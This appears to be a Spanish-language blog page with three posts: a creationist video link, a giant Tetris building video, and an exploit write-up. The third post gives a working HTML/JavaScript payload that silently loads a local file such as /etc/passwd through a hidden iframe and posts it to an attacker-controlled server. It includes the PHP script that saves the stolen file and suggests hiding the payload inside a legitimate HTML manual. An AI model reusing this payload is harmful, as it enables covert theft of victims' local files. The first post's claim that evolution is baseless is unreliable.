Vision Cristiana sobre la extincion de los dinosaurios

Debes ver esto!
es sorprendentemente cierto y tiene mas fundamentos que las extrañas teorias de que una especie puede convertirse en otra.

http://www.youtube.com/watch?v=uxMJIyWKKDA&mode=related&search=

Tetris Gigante!!!

Esto es el colmo geek. El juego mas grande de tetris jamas jugado: los pixeles son ventanas de un edificio. No se como hicieron esto, no he encontrado detalles, pero se dice por ahi que fue controlado por telefono. Mucho mas geek aun!!!! http://www.youtube.com/v/Zq5vXqrIwjE

Lectura arbitraria de archivo local con iFrames, DOM y JavaScript

Este Post ha sido Actualizado

Descubri que existe una forma muy sencilla de subir archivos locales arbitrarios a un servidor remoto a partir de un rejuego de iframes y javascript.

Hasta ahora, esta prueba funciono con:
- Mozilla Firefox v2.0.0.3
- Safari v2.0.4 (419.3)


Planteamos el siguiente escenario:

• Victima: Custodio del archivo que deseamos, por ejemplo: /etc/shadow
• Victimario: Persona interesada en adquirir el archivo.
• Servidor Web del Victimario: Este recibira el archivo deseado.
• Archivo HTML: Este archivo es portador del script que hace el trabajo. Podrias, por ejemplo, insertar dicho script en un Manual HTML legitimo.

Contenido del Archivo quiero-tu-etc-passwd.html <h1>Hola</h1> <b>Solo soy un simple e inofensivo archivo HTML (si claro!)</b> <iframe onLoad="robatelo()" style="visibility:hidden;position:absolute;" id="ifr"></iframe> <form id="robar" method="POST"> <input type="hidden" name="data"> <input type="hidden" name="sent" value="0"> </form> <script> var file='/etc/passwd', // Test en windows con 'C:/boot.ini'; s=document.getElementById('ifr'), p=document.getElementById('robar'); s.src='file://'+file; function robatelo(){ var c=escape(s.contentDocument.body.firstChild.innerHTML); p.action='http://<tu host>/getit.php?file='+file; if(p.sent.value=='1') return; p.sent.value='1'; p.data.value=s.contentDocument.firstChild.innerHTML; p.submit(); }</script>

Notemos que hay un iframe que carga el archivo deseado (/etc/passwd), sabemos que via XMLHTTPRequest() es muy ruidoso hacer un upload, ya que por default los browsers impiden esto entre dos zonas diferentes (local y remota).
Por tanto, el script lo que hace es cambiar los datos de un form, hacer un post con el contenido del iframe como el parametro data al php, el cual rapidamente devolvera a la pagina anterior.

Veamos getit.php <?php if(!$_GET['file'])exit; $ff=str_replace('/','_',$_GET['file']); $f=fopen($ff,"w"); fwrite($f,$_POST['data']); fclose($f); print "<script>history.back();</script>\n"; ?>

Ventajas:

• Obtencion de archivos de una forma casi imperceptible
• Utiliza canales ya autorizados (el web browser predefinido)
• No genera y no viola las politicas de seguridad del browser ni las del firewall

Desventajas:

• Se debe conocer previamente el nombre del archivo.
• La victima debe recibir previamente el documento.

Planes futuros:

• Investigar la posibilidad de hacer esto de forma remota
• Implementar la misma tecnica en Widgets para Mac OS X